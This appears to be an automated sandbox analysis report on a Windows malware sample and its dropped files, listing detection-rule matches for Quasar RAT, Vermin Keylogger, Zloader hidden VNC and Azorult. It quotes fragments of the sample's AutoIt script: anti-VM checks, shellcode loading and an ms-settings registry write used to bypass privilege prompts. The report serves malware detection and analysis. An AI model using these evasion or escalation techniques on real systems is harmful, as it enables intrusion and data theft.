Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth

Binary is likely a compiled AutoIt script file

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00DB3B3A
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.	7_2_00DB3B3A
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: This is a third-party compiled AutoIt script.	10_2_00A43B3A
Source: SystemPropertiesPerformance.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`

AutoIt script contains suspicious strings

Show sources

Source: CVbJSUXraQ.exe	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBFCE0	1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBE6A0	1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBDF00	1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC8808	1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDD975	1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE62D2	1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB1287	1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD1484	1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E37DDB	1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE6DB6	1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDBDA6	1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC66E1	1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC6F9E	1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB104C	4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC50BE	4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC4C28	4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC59EA	4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5554	4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE153	4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5E80	4_2_00AC5E80
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC6263	4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADD39B	4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AD2F13	4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C788A0	5_2_00C788A0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C694B0	5_2_00C694B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63C6C	5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B420	5_2_00C7B420
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C809D4	5_2_00C809D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C72DE0	5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76984	5_2_00C76984
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C799B0	5_2_00C799B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84174	5_2_00C84174
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7DED4	5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FAD4	5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7EADC	5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C766A4	5_2_00C766A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C73A10	5_2_00C73A10
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C687CC	5_2_00C687CC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C727D4	5_2_00C727D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC	5_2_00C803EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C733EC	5_2_00C733EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84BE4	5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82F5C	5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6B36C	5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C68F68	5_2_00C68F68
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C78F34	5_2_00C78F34
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9878	5_2_00CA9878
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA1A4	5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9D0E	5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAAD0	5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAEB3	5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA63A	5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CB7B63	5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F12EC4	6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F18FCC	6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F17482	6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC8808	7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC3030	7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD21C5	7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD3187	7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1978	7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB1287	7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDCB21	7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBFCE0	7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1484	7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD25FA	7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E37DDB	7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1D90	7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5520	7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5760	7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBDF00	7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A63187	10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4FCE0	10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4E6A0	10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4DF00	10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A53030	10_2_00A53030
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A58808	10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A621C5	10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6F1D9	10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6D975	10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61978	10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A41287	10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A762D2	10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6CB21	10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61484	10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A7242E	10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6BDA6	10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A76DB6	10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61D90	10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A625FA	10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AC7DDB	10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55520	10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A566E1	10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A56F9E	10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55760	10_2_00A55760

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process Stats: CPU usage > 98%

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
